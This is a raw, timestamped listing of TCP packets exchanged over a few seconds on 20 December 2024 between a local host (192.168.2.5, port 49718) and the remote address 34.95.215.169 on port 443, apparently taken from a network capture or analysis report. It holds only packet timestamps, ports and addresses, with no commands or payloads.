                                                      Dec 20, 2024 15:28:27.447513103 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.450541019 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.450604916 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.453088999 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.453149080 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.455913067 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.455986977 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.458336115 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.458422899 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.460951090 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.461024046 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.476329088 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.476385117 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.478991985 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.479067087 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.481575012 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.481637955 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.547467947 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.547581911 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.621165991 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.621263027 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.623625040 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.623693943 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.626121044 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.626183987 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.629389048 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.629451036 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.631922007 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.631983042 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.636173010 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.636238098 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.640867949 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.640924931 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.642503023 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.642566919 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.645034075 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.645095110 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.646514893 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.646579981 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.649045944 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.649105072 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.651643991 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.651777983 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.671216011 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.671289921 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.673928022 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.673991919 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.676489115 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.676554918 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.737965107 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.738190889 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.812180996 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.812381029 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.815495968 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.815567017 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.817924976 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.817985058 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.820631027 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.820691109 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.823002100 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.823065996 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.826251030 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.826316118 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.829097033 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.829157114 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.831969976 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.832032919 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.836117029 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.836235046 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.837342024 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.837403059 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.839912891 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.839977980 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.842300892 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.842381001 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.859138012 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.859224081 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.861051083 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.861129999 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.864120960 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.864193916 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:27.929464102 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:27.929543972 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.003751993 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.003825903 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.006326914 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.006401062 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.008812904 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.008884907 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.012072086 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.012135983 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.014090061 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.014153004 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.017103910 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.017179966 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.019560099 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.019634962 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.022209883 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.022279024 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.024647951 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.024717093 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.027864933 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.027930975 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.030891895 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.030953884 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.033386946 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.033451080 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.035887003 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.035948038 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.055887938 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.055963039 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.058384895 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.058468103 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.061050892 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.061180115 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.122951984 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.123022079 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.421112061 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.421125889 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.421242952 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.511570930 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.511677027 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.512510061 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.512587070 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.514321089 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.514384031 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.515382051 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.515439987 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.517234087 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.517317057 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.518270969 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.518336058 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.519679070 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.519746065 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.521528006 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.521595001 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.522495985 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.522571087 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.524369955 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.524442911 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.525464058 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.525527000 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.527256966 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.527333975 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.528264999 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.528326988 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.530123949 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.530186892 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.531456947 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.531538010 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.535368919 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.535432100 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.537040949 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.537108898 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.538551092 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.538614035 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.539668083 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.539733887 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.541429043 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.541491985 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.542467117 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.542529106 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.544290066 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.544353962 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.545319080 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.545376062 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.547200918 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.547266006 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.548152924 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.548217058 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.549407005 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.549479961 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.551223040 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.551294088 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.552242994 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.552314997 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.554120064 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.554183960 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.555100918 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.555156946 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.558999062 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.559063911 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.595525026 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.595624924 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.597212076 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.597291946 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.600394964 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.600471020 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.603004932 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.603128910 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.605437040 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.605535984 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.608596087 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.608673096 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.611073971 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.611159086 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.613734007 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.613822937 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.616215944 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.616293907 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.619647980 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.619726896 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.621845961 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.621932030 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.624785900 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.624865055 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.627403021 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.627477884 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.637192965 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.637274027 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.639683008 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.639744043 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.642808914 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.642873049 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.699168921 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.699251890 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.789058924 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.789153099 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.791997910 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.792073965 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.794548035 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.794627905 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.797069073 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.797137976 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.799747944 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.799810886 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.803049088 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.803116083 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.805298090 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.805368900 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.807699919 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.807763100 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.810750961 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.810811996 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.813086033 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.813178062 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.815994978 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.816061020 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.818505049 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.818572044 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.828141928 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.828200102 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.830858946 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.830928087 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.833183050 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.833249092 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.893451929 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.893520117 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.980559111 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.980637074 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.983125925 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.983198881 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.985627890 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.985693932 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.987920046 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.987983942 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.991437912 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.991497993 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.993663073 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.993727922 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.996231079 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.996290922 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:28.998841047 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:28.998903990 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.001874924 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.001941919 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.004205942 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.004271984 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.007042885 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.007107973 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.009627104 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.009691954 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.019377947 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.019457102 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.022206068 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.022301912 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.024561882 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.024626017 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.085194111 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.085365057 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.172183037 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.172322035 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.174169064 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.174237967 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.177546024 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.177608013 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.179776907 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.179841042 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.182454109 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.182518959 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.185803890 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.185880899 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.188015938 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.188098907 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.193268061 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.193454981 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.195084095 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.195154905 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.196758986 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.196830988 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.198921919 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.198995113 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.201389074 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.201466084 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.203802109 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.203912020 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.215209007 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.215284109 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.217621088 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.217693090 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.220067978 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.220171928 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.279107094 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.279191971 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.365664959 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.365767002 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.368822098 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.368904114 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.371300936 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.371376991 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.374030113 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.374108076 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.376281977 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.376367092 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.379235983 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.379317999 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.381793976 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.381871939 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.384140968 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.384229898 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.387448072 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.387520075 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.389417887 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.389487982 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.392648935 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.392719984 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.395117998 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.395195007 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.407155991 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.407237053 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.410245895 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.410322905 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:29.412748098 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:29.412827969 CET49718443192.168.2.534.95.215.169
